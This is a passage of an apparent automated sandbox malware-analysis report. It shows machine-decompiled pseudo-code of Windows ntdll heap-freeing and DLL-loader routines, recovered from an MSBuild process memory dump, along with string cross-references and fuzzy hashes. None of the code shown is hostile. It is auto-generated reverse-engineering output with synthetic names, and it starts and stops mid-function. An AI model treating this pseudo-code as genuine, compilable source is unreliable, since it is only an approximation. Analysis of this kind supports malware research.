                                            						_t131 = _t127 & 0xfffff000;
                                            						__eflags = _t131 - _t256;
                                            						if(_t131 != _t256) {
                                            							_t156 =  *[fs:0x30];
                                            							__eflags =  *(_t156 + 0xc);
                                            							if( *(_t156 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                            							_t131 = E0100B150();
                                            							__eflags =  *0x10f7bc8;
                                            							if(__eflags == 0) {
                                            								_t131 = E010C2073(_t206, 1, _t251, __eflags);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				goto L41;
                                            			}























































                                            0x0102a998
                                            0x0102a99f
                                            0x0102a9a2
                                            0x0107238a
                                            0x0102a9a8
                                            0x0102a9a8
                                            0x0102a9a8
                                            0x0102a9aa
                                            0x0102a9ad
                                            0x0102a9b0
                                            0x0102a9bb
                                            0x0102a9be
                                            0x0102a9c7
                                            0x0102a9c9
                                            0x0102a9c9
                                            0x0102a9cc
                                            0x0102a9d1
                                            0x0102aa6d
                                            0x0102aa70
                                            0x0102aa73
                                            0x0102aa75
                                            0x0102aa79
                                            0x0102aa7e
                                            0x0102aa82
                                            0x0102aa8f
                                            0x0102aa94
                                            0x0102aa96
                                            0x01072392
                                            0x010723a1
                                            0x010723a1
                                            0x0102aa9c
                                            0x0102aa9f
                                            0x0102aaa2
                                            0x0102aaa2
                                            0x0102aaa8
                                            0x0102aaab
                                            0x0102aaaf
                                            0x00000000
                                            0x0102aab5
                                            0x00000000
                                            0x0102aab5
                                            0x0102a9d7
                                            0x0102a9d7
                                            0x0102a9da
                                            0x0102a9e0
                                            0x0102a9e3
                                            0x0102a9e6
                                            0x0102a9e9
                                            0x0102a9eb
                                            0x0102a9fd
                                            0x0102a9fd
                                            0x00000000
                                            0x0102a9eb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a983
                                            0x0102a983
                                            0x0102a983
                                            0x0102a987
                                            0x0102a995
                                            0x0102a995
                                            0x0102a995
                                            0x0102a995
                                            0x0102a989
                                            0x0102a98e
                                            0x00000000
                                            0x0102a990
                                            0x00000000
                                            0x0102a990
                                            0x0102a98e
                                            0x00000000
                                            0x0102a983
                                            0x0102a972
                                            0x0102a90a
                                            0x0102aa34
                                            0x0102aa34
                                            0x0102aa40
                                            0x0102aa43
                                            0x0102aa46
                                            0x0102aa4d
                                            0x010723ab
                                            0x010723b2
                                            0x010723b8
                                            0x010723be
                                            0x010723c3
                                            0x010723c5
                                            0x010723cb
                                            0x010723d1
                                            0x010723d5
                                            0x010723f6
                                            0x010723fb
                                            0x010723d7
                                            0x010723ec
                                            0x010723f1
                                            0x01072403
                                            0x01072408
                                            0x01072410
                                            0x01072417
                                            0x01072422
                                            0x01072422
                                            0x01072417
                                            0x010723c5
                                            0x010723b2
                                            0x00000000

                                            Strings
                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01072403
                                            • HEAP: , xrefs: 010722E6, 010723F6
                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010722F3
                                            • HEAP[%wZ]: , xrefs: 010722D7, 010723E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                            • API String ID: 0-1657114761
                                            • Opcode ID: 4b935887a3c7eb4056514385d4d06eeb4d9b72d077b85f9f7901580e652d0453
                                            • Instruction ID: d9547e6a0143f4d1414a16f619f291db8139885d5b55ec376e3b8f43f806d60b
                                            • Opcode Fuzzy Hash: 4b935887a3c7eb4056514385d4d06eeb4d9b72d077b85f9f7901580e652d0453
                                            • Instruction Fuzzy Hash: EAD1CD34B00656DFDB19CF68C490BBAB7F1BF48300F1485A9D9CA9BB42EB34A845CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E0102A229(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				char _v28;
                                            				void* _v44;
                                            				void* _v48;
                                            				void* _v56;
                                            				void* _v60;
                                            				void* __ebx;
                                            				signed int _t55;
                                            				signed int _t57;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t65;
                                            				void* _t71;
                                            				signed char* _t74;
                                            				intOrPtr _t75;
                                            				signed char* _t80;
                                            				intOrPtr _t81;
                                            				void* _t82;
                                            				signed char* _t85;
                                            				signed char _t91;
                                            				void* _t103;
                                            				void* _t105;
                                            				void* _t121;
                                            				void* _t129;
                                            				signed int _t131;
                                            				void* _t133;
                                            
                                            				_t105 = __ecx;
                                            				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                            				_t103 = __edx;
                                            				_t129 = __ecx;
                                            				E0102DF24(__edx,  &_v28, _t133);
                                            				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                            				asm("sbb edi, edi");
                                            				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                            				if(_t55 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t129);
                                            					_push(0xffffffff);
                                            					_t57 = E01049730();
                                            					__eflags = _t57;
                                            					if(_t57 < 0) {
                                            						L17:
                                            						_push(_t105);
                                            						E010CA80D(_t129, 1, _v20, 0);
                                            						_t121 = 4;
                                            						goto L1;
                                            					}
                                            					__eflags = _v20 & 0x00000060;
                                            					if((_v20 & 0x00000060) == 0) {
                                            						goto L17;
                                            					}
                                            					__eflags = _v24 - _t129;
                                            					if(_v24 == _t129) {
                                            						goto L1;
                                            					}
                                            					goto L17;
                                            				}
                                            				L1:
                                            				_push(_t121);
                                            				_push(0x1000);
                                            				_push(_t133 + 0x14);
                                            				_push(0);
                                            				_push(_t133 + 0x20);
                                            				_push(0xffffffff);
                                            				_t61 = E01049660();
                                            				_t122 = _t61;
                                            				if(_t61 < 0) {
                                            					_t62 =  *[fs:0x30];
                                            					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                            					__eflags =  *(_t62 + 0xc);
                                            					if( *(_t62 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *((intOrPtr*)(_t133 + 0xc)));
                                            					_push( *((intOrPtr*)(_t133 + 0x14)));
                                            					_push(_t129);
                                            					E0100B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                            					_t65 = 0;
                                            					L13:
                                            					return _t65;
                                            				}
                                            				_t71 = E01027D50();
                                            				_t124 = 0x7ffe0380;
                                            				if(_t71 != 0) {
                                            					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t74 = 0x7ffe0380;
                                            				}
                                            				if( *_t74 != 0) {
                                            					_t75 =  *[fs:0x30];
                                            					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                            					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                            						E010C138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                            					}
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                            				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                            				if(E01027D50() != 0) {
                                            					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				} else {
                                            					_t80 = _t124;
                                            				}
                                            				if( *_t80 != 0) {
                                            					_t81 =  *[fs:0x30];
                                            					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                            					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                            						__eflags = E01027D50();
                                            						if(__eflags != 0) {
                                            							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            						}
                                            						E010C1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                            					}
                                            				}
                                            				_t82 = E01027D50();
                                            				_t125 = 0x7ffe038a;
                                            				if(_t82 != 0) {
                                            					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            				} else {
                                            					_t85 = 0x7ffe038a;
                                            				}
                                            				if( *_t85 != 0) {
                                            					__eflags = E01027D50();
                                            					if(__eflags != 0) {
                                            						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            					}
                                            					E010C1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                            				}
                                            				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                            				_t91 =  *(_t103 + 2);
                                            				if((_t91 & 0x00000004) != 0) {
                                            					E0105D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                            					_t91 =  *(_t103 + 2);
                                            				}
                                            				 *(_t103 + 2) = _t91 & 0x00000017;
                                            				_t65 = 1;
                                            				goto L13;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 2994545307-2586055223
                                            • Opcode ID: 9ec39d9ffb24cb01884901945547e51ef2420fe96cca900f7e7d56be5858aa69
                                            • Instruction ID: b42fd060b67471d53983e3e1f449ec3a6a069932137644465781a8a18e8e1ddc
                                            • Opcode Fuzzy Hash: 9ec39d9ffb24cb01884901945547e51ef2420fe96cca900f7e7d56be5858aa69
                                            • Instruction Fuzzy Hash: 2B51F532604691DFE322EB68C844F6B77E9FB94B50F0904A8F5D58B2D2DB34D904CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E01038E00(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t43;
                                            				void* _t46;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            				intOrPtr* _t51;
                                            				signed int _t52;
                                            				void* _t53;
                                            				intOrPtr _t55;
                                            
                                            				_v8 =  *0x10fd360 ^ _t52;
                                            				_t49 = 0;
                                            				_t48 = __ecx;
                                            				_t55 =  *0x10f8464; // 0x76690110
                                            				if(_t55 == 0) {
                                            					L9:
                                            					if( !_t49 >= 0) {
                                            						if(( *0x10f5780 & 0x00000003) != 0) {
                                            							E01085510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                            						}
                                            						if(( *0x10f5780 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            					}
                                            					return E0104B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                            				}
                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                            				_t43 =  *0x10f7984; // 0xac2bd8
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                            					if(_t48 == _t43) {
                                            						_t50 = 0x5c;
                                            						if( *_t32 == _t50) {
                                            							_t46 = 0x3f;
                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                            								_t32 = _t32 + 8;
                                            							}
                                            						}
                                            					}
                                            					_t51 =  *0x10f8464; // 0x76690110
                                            					 *0x10fb1e0(_t47, _t32,  &_v12);
                                            					_t49 =  *_t51();
                                            					if(_t49 >= 0) {
                                            						L8:
                                            						_t35 = _v12;
                                            						if(_t35 != 0) {
                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                            								E01039B10( *((intOrPtr*)(_t48 + 0x48)));
                                            								_t35 = _v12;
                                            							}
                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                            						}
                                            						goto L9;
                                            					}
                                            					if(_t49 != 0xc000008a) {
                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                            							if(_t49 != 0xc00000bb) {
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            					if(( *0x10f5780 & 0x00000005) != 0) {
                                            						_push(_t49);
                                            						E01085510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                            						_t53 = _t53 + 0x1c;
                                            					}
                                            					_t49 = 0;
                                            					goto L8;
                                            				} else {
                                            					goto L9;
                                            				}
                                            			}





















                                            Strings
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0107933B, 01079367
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0107932A
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01079357
                                            • LdrpFindDllActivationContext, xrefs: 01079331, 0107935D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: 9ada45fa88e5283380b1d64f31d3b5f1823f211b2fa05d53c8f34a2db486d941
                                            • Instruction ID: 62ecb5ff80b8d43469f708d0a94027633561da4c9c58c24147e24264ccd1fee6
                                            • Opcode Fuzzy Hash: 9ada45fa88e5283380b1d64f31d3b5f1823f211b2fa05d53c8f34a2db486d941
                                            • Instruction Fuzzy Hash: 4A413B31A003159FEB71AA1D8849A79B6FDBB80358F05C3EBF9D457491EB70AC8083A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 2994545307-336120773
                                            • Opcode ID: 647e260a64d8a3e33e4e8a3d7a65a18ec260516e41f15bf3088a3f8bb17f27da
                                            • Instruction ID: d842cae4bdc0e41c58377f0d4a4382d314899aa09e56b0f24cdce22187dcfcf7
                                            • Opcode Fuzzy Hash: 647e260a64d8a3e33e4e8a3d7a65a18ec260516e41f15bf3088a3f8bb17f27da
                                            • Instruction Fuzzy Hash: 07310E35200544EFE321DB9DC895FAE77E8FF04B60F2440AAF985DB291D671A880DA69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E010299BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                            				char _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed short _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed short _t186;
                                            				intOrPtr _t187;
                                            				signed short _t190;
                                            				signed int _t196;
                                            				signed short _t197;
                                            				intOrPtr _t203;
                                            				signed int _t207;
                                            				signed int _t210;
                                            				signed short _t215;
                                            				intOrPtr _t216;
                                            				signed short _t219;
                                            				signed int _t221;
                                            				signed short _t222;
                                            				intOrPtr _t228;
                                            				signed int _t232;
                                            				signed int _t235;
                                            				signed int _t250;
                                            				signed short _t251;
                                            				intOrPtr _t252;
                                            				signed short _t254;
                                            				intOrPtr _t255;
                                            				signed int _t258;
                                            				signed int _t259;
                                            				signed short _t262;
                                            				intOrPtr _t271;
                                            				signed int _t279;
                                            				signed int _t282;
                                            				signed int _t284;
                                            				signed int _t286;
                                            				intOrPtr _t292;
                                            				signed int _t296;
                                            				signed int _t299;
                                            				signed int _t307;
                                            				signed int* _t309;
                                            				signed short* _t311;
                                            				signed short* _t313;
                                            				signed char _t314;
                                            				intOrPtr _t316;
                                            				signed int _t323;
                                            				signed char _t328;
                                            				signed short* _t330;
                                            				signed char _t331;
                                            				intOrPtr _t335;
                                            				signed int _t342;
                                            				signed char _t347;
                                            				signed short* _t348;
                                            				signed short* _t350;
                                            				signed short _t352;
                                            				signed char _t354;
                                            				intOrPtr _t357;
                                            				intOrPtr* _t364;
                                            				signed char _t365;
                                            				intOrPtr _t366;
                                            				signed int _t373;
                                            				signed char _t378;
                                            				signed int* _t381;
                                            				signed int _t382;
                                            				signed short _t384;
                                            				signed int _t386;
                                            				unsigned int _t390;
                                            				signed int _t393;
                                            				signed int* _t394;
                                            				unsigned int _t398;
                                            				signed short _t400;
                                            				signed short _t402;
                                            				signed int _t404;
                                            				signed int _t407;
                                            				unsigned int _t411;
                                            				signed short* _t414;
                                            				signed int _t415;
                                            				signed short* _t419;
                                            				signed int* _t420;
                                            				void* _t421;
                                            
                                            				_t414 = __edx;
                                            				_t307 = __ecx;
                                            				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                            				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                            					_v5 = _a8;
                                            					L3:
                                            					_t381 = _a4;
                                            					goto L4;
                                            				} else {
                                            					__eflags =  *(__ecx + 0x4c);
                                            					if( *(__ecx + 0x4c) != 0) {
                                            						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                            						 *_t419 = _t411;
                                            						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                            						__eflags = _t411 >> 0x18 - _t378;
                                            						if(__eflags != 0) {
                                            							_push(_t378);
                                            							E010BFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                            						}
                                            					}
                                            					_t250 = _a8;
                                            					_v5 = _t250;
                                            					__eflags = _t250;
                                            					if(_t250 != 0) {
                                            						_t400 = _t414[6];
                                            						_t53 =  &(_t414[4]); // -16
                                            						_t348 = _t53;
                                            						_t251 =  *_t348;
                                            						_v12 = _t251;
                                            						_v16 = _t400;
                                            						_t252 =  *((intOrPtr*)(_t251 + 4));
                                            						__eflags =  *_t400 - _t252;
                                            						if( *_t400 != _t252) {
                                            							L49:
                                            							_push(_t348);
                                            							_push( *_t400);
                                            							E010CA80D(_t307, 0xd, _t348, _t252);
                                            							L50:
                                            							_v5 = 0;
                                            							goto L11;
                                            						}
                                            						__eflags =  *_t400 - _t348;
                                            						if( *_t400 != _t348) {
                                            							goto L49;
                                            						}
                                            						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            						_t407 =  *(_t307 + 0xb4);
                                            						__eflags = _t407;
                                            						if(_t407 == 0) {
                                            							L36:
                                            							_t364 = _v16;
                                            							_t282 = _v12;
                                            							 *_t364 = _t282;
                                            							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                            							__eflags = _t414[1] & 0x00000008;
                                            							if((_t414[1] & 0x00000008) == 0) {
                                            								L39:
                                            								_t365 = _t414[1];
                                            								__eflags = _t365 & 0x00000004;
                                            								if((_t365 & 0x00000004) != 0) {
                                            									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            									_v12 = _t284;
                                            									__eflags = _t365 & 0x00000002;
                                            									if((_t365 & 0x00000002) != 0) {
                                            										__eflags = _t284 - 4;
                                            										if(_t284 > 4) {
                                            											_t284 = _t284 - 4;
                                            											__eflags = _t284;
                                            											_v12 = _t284;
                                            										}
                                            									}
                                            									_t78 =  &(_t414[8]); // -8
                                            									_t286 = E0105D540(_t78, _t284, 0xfeeefeee);
                                            									_v16 = _t286;
                                            									__eflags = _t286 - _v12;
                                            									if(_t286 != _v12) {
                                            										_t366 =  *[fs:0x30];
                                            										__eflags =  *(_t366 + 0xc);
                                            										if( *(_t366 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_v16 + 0x10 + _t414);
                                            										E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            										_t292 =  *[fs:0x30];
                                            										_t421 = _t421 + 0xc;
                                            										__eflags =  *((char*)(_t292 + 2));
                                            										if( *((char*)(_t292 + 2)) != 0) {
                                            											 *0x10f6378 = 1;
                                            											asm("int3");
                                            											 *0x10f6378 = 0;
                                            										}
                                            									}
                                            								}
                                            								goto L50;
                                            							}
                                            							_t296 = E0102A229(_t307, _t414);
                                            							__eflags = _t296;
                                            							if(_t296 != 0) {
                                            								goto L39;
                                            							} else {
                                            								E0102A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            								goto L50;
                                            							}
                                            						} else {
                                            							_t373 =  *_t414 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                            								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                            									_t301 = _t373;
                                            									break;
                                            								}
                                            								_t299 =  *_t407;
                                            								__eflags = _t299;
                                            								if(_t299 == 0) {
                                            									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									break;
                                            								} else {
                                            									_t407 = _t299;
                                            									continue;
                                            								}
                                            							}
                                            							_t62 =  &(_t414[4]); // -16
                                            							E0102BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                            							goto L36;
                                            						}
                                            					}
                                            					L11:
                                            					_t402 = _t419[6];
                                            					_t25 =  &(_t419[4]); // -16
                                            					_t350 = _t25;
                                            					_t254 =  *_t350;
                                            					_v12 = _t254;
                                            					_v20 = _t402;
                                            					_t255 =  *((intOrPtr*)(_t254 + 4));
                                            					__eflags =  *_t402 - _t255;
                                            					if( *_t402 != _t255) {
                                            						L61:
                                            						_push(_t350);
                                            						_push( *_t402);
                                            						E010CA80D(_t307, 0xd, _t350, _t255);
                                            						goto L3;
                                            					}
                                            					__eflags =  *_t402 - _t350;
                                            					if( *_t402 != _t350) {
                                            						goto L61;
                                            					}
                                            					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                            					_t404 =  *(_t307 + 0xb4);
                                            					__eflags = _t404;
                                            					if(_t404 == 0) {
                                            						L20:
                                            						_t352 = _v20;
                                            						_t258 = _v12;
                                            						 *_t352 = _t258;
                                            						 *(_t258 + 4) = _t352;
                                            						__eflags = _t419[1] & 0x00000008;
                                            						if((_t419[1] & 0x00000008) != 0) {
                                            							_t259 = E0102A229(_t307, _t419);
                                            							__eflags = _t259;
                                            							if(_t259 != 0) {
                                            								goto L21;
                                            							} else {
                                            								E0102A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                            								goto L3;
                                            							}
                                            						}
                                            						L21:
                                            						_t354 = _t419[1];
                                            						__eflags = _t354 & 0x00000004;
                                            						if((_t354 & 0x00000004) != 0) {
                                            							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                            							__eflags = _t354 & 0x00000002;
                                            							if((_t354 & 0x00000002) != 0) {
                                            								__eflags = _t415 - 4;
                                            								if(_t415 > 4) {
                                            									_t415 = _t415 - 4;
                                            									__eflags = _t415;
                                            								}
                                            							}
                                            							_t91 =  &(_t419[8]); // -8
                                            							_t262 = E0105D540(_t91, _t415, 0xfeeefeee);
                                            							_v20 = _t262;
                                            							__eflags = _t262 - _t415;
                                            							if(_t262 != _t415) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0xc);
                                            								if( *(_t357 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_v20 + 0x10 + _t419);
                                            								E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                            								_t271 =  *[fs:0x30];
                                            								_t421 = _t421 + 0xc;
                                            								__eflags =  *((char*)(_t271 + 2));
                                            								if( *((char*)(_t271 + 2)) != 0) {
                                            									 *0x10f6378 = 1;
                                            									asm("int3");
                                            									 *0x10f6378 = 0;
                                            								}
                                            							}
                                            						}
                                            						_t381 = _a4;
                                            						_t414 = _t419;
                                            						_t419[1] = 0;
                                            						_t419[3] = 0;
                                            						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                            						 *_t419 =  *_t381;
                                            						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                            						L4:
                                            						_t420 = _t414 +  *_t381 * 8;
                                            						if( *(_t307 + 0x4c) == 0) {
                                            							L6:
                                            							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                            								__eflags =  *(_t307 + 0x4c);
                                            								if( *(_t307 + 0x4c) != 0) {
                                            									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                            									 *_t420 = _t390;
                                            									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                            									__eflags = _t390 >> 0x18 - _t328;
                                            									if(__eflags != 0) {
                                            										_push(_t328);
                                            										E010BFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                            									}
                                            								}
                                            								__eflags = _v5;
                                            								if(_v5 == 0) {
                                            									L94:
                                            									_t382 = _t420[3];
                                            									_t137 =  &(_t420[2]); // -16
                                            									_t309 = _t137;
                                            									_t186 =  *_t309;
                                            									_v20 = _t186;
                                            									_v16 = _t382;
                                            									_t187 =  *((intOrPtr*)(_t186 + 4));
                                            									__eflags =  *_t382 - _t187;
                                            									if( *_t382 != _t187) {
                                            										L63:
                                            										_push(_t309);
                                            										_push( *_t382);
                                            										_push(_t187);
                                            										_push(_t309);
                                            										_push(0xd);
                                            										L64:
                                            										E010CA80D(_t307);
                                            										continue;
                                            									}
                                            									__eflags =  *_t382 - _t309;
                                            									if( *_t382 != _t309) {
                                            										goto L63;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                            									_t393 =  *(_t307 + 0xb4);
                                            									__eflags = _t393;
                                            									if(_t393 == 0) {
                                            										L104:
                                            										_t330 = _v16;
                                            										_t190 = _v20;
                                            										 *_t330 = _t190;
                                            										 *(_t190 + 4) = _t330;
                                            										__eflags = _t420[0] & 0x00000008;
                                            										if((_t420[0] & 0x00000008) == 0) {
                                            											L107:
                                            											_t331 = _t420[0];
                                            											__eflags = _t331 & 0x00000004;
                                            											if((_t331 & 0x00000004) != 0) {
                                            												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t196;
                                            												__eflags = _t331 & 0x00000002;
                                            												if((_t331 & 0x00000002) != 0) {
                                            													__eflags = _t196 - 4;
                                            													if(_t196 > 4) {
                                            														_t196 = _t196 - 4;
                                            														__eflags = _t196;
